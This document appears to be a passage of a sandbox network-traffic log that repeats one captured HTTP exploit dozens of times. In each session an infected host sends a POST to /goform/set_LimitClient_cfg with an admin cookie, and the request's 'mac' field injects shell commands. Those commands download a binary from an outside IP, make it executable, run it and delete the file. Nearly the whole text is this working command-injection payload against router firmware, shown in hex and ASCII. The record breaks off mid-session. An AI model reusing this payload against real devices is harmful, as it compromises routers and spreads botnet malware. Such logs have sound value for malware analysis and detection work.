                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3048192.168.2.234240061.112.171.148080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505539894 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3049192.168.2.2348718186.199.16.958080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505595922 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3050192.168.2.235839412.168.112.998080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505644083 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3051192.168.2.2354420191.249.75.288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505697966 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3052192.168.2.2333560160.94.209.328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505721092 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3053192.168.2.2351212153.108.145.498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505798101 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3054192.168.2.235908870.78.66.168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505817890 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3055192.168.2.2355330186.1.164.1958080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505841970 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3056192.168.2.2336304121.214.63.2228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505872011 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3057192.168.2.235063651.162.38.1698080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505882978 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3058192.168.2.2333150211.215.45.2428080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.505975008 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3059192.168.2.235812259.223.126.1178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506005049 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3060192.168.2.2360358167.128.151.2518080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506021976 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3061192.168.2.234593852.129.221.418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506062984 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3062192.168.2.235510834.20.113.198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506086111 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3063192.168.2.2348182170.75.232.1768080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506418943 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3064192.168.2.233589494.67.171.258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506453037 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3065192.168.2.2348288212.203.100.1838080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506526947 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3066192.168.2.234283492.181.143.1658080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506553888 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3067192.168.2.234993282.24.101.288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506712914 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3068192.168.2.2350960139.73.44.758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506736994 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3069192.168.2.235195287.244.177.1188080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506755114 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3070192.168.2.234556859.57.239.2098080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.506788015 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
